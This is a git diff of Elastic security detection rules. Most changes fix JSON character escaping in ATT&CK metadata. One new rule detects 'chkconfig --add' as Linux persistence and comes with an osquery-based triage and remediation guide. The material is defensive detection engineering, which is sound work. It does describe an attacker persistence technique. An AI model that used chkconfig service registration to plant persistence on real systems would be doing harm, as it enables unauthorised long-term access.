+++ b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_3.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_4.json b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_4.json
index d5f03e41ce2..93b12938bcb 100644
--- a/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_4.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -107,7 +107,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_103.json b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_103.json
index 5200b1d6a5f..d2255fe3dac 100644
--- a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_103.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 73,
 "rule_id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_104.json b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_104.json
index 84c3f7627ba..995bc9311bf 100644
--- a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_104.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 73,
 "rule_id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_105.json b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_105.json
index 04d692d29d9..626ed0ab869 100644
--- a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_105.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 73,
 "rule_id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_106.json b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_106.json
index 7b44f7cc23b..46d4743f74a 100644
--- a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_106.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 73,
 "rule_id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_102.json b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_102.json
index 8820d7b8eba..b6c7d983419 100644
--- a/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_103.json b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_103.json
index d834aef2e1e..10def0bac05 100644
--- a/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_103.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_104.json b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_104.json
index 594e1d21d13..0c2ffeef589 100644
--- a/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_104.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_1.json b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_1.json
index 24c553a5d41..69a62a258dd 100644
--- a/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_1.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -70,7 +70,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_2.json b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_2.json
index f80531c5c11..d2b0dbd0c68 100644
--- a/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_2.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_103.json b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_103.json
index 657ac999b2c..40d6e06ecad 100644
--- a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_103.json
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_104.json b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_104.json
index 0ebc016a0bd..3b9b8e1fc8e 100644
--- a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_104.json
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_105.json b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_105.json
index 176f2e719dd..f533f74a6b1 100644
--- a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_105.json
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_106.json b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_106.json
index 3156b78ab29..9f267f05c0b 100644
--- a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_106.json
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -99,7 +99,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -121,7 +121,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_107.json b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_107.json
index f19ee0f6461..473ad0c512b 100644
--- a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_107.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -120,7 +120,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_103.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_103.json
index b7790e577fc..2887e10a000 100644
--- a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_103.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_104.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_104.json
index 7d2996a63ef..d0c4bfc7754 100644
--- a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_104.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_105.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_105.json
index 770d9985167..31611fda86e 100644
--- a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_105.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_106.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_106.json
index aa070217ad7..995a37b252c 100644
--- a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_106.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_107.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_107.json
index 317ff7458e9..e105f532bf5 100644
--- a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_107.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_108.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_108.json
index 10e11af9c4b..4adb59ebdd2 100644
--- a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_108.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_109.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_109.json
new file mode 100644
index 00000000000..416257a5151
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_109.json
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of the chkconfig binary to manually add a service for management by chkconfig. Threat actors may utilize this technique to maintain persistence on a system. When a new service is added, chkconfig ensures that the service has either a start or a kill entry in every runlevel and when the system is rebooted the service file added will run providing long-term persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Chkconfig Service Add", + "note": "## Triage and analysis\n\n### Investigating Chkconfig Service Add\nService files are configuration files in Linux systems used to define and manage system services. The `Chkconfig` binary can be used to manually add, delete or modify a service. \n\nMalicious actors can leverage services to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection.\n\nThis rule monitors the usage of the `chkconfig` binary to manually add a service for management by `chkconfig`, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the service that was created or modified.\n- Investigate the currently enabled system services through the following commands `sudo chkconfig --list | grep on` and `sudo systemctl list-unit-files`.\n- Investigate the status of potentially suspicious services through the `chkconfig --list service_name` command. \n- Search for the `rc.d` or `init.d` service files that were created or modified, and analyze their contents.\n- Investigate whether any other files in any of the available `rc.d` or `init.d` directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/etc/rc%.d/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/etc/rc%.d/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, 
remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses the `chkconfig` binary for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n- New Systemd Service Created by Previously Unknown Process - 17b0a495-4d9f-414c-8ad0-92f018b8e001\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n( \n (process.executable : \"/usr/sbin/chkconfig\" and process.args : \"--add\") or\n (process.args : \"*chkconfig\" and process.args : \"--add\")\n)\n",
+ "references": [
+ "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
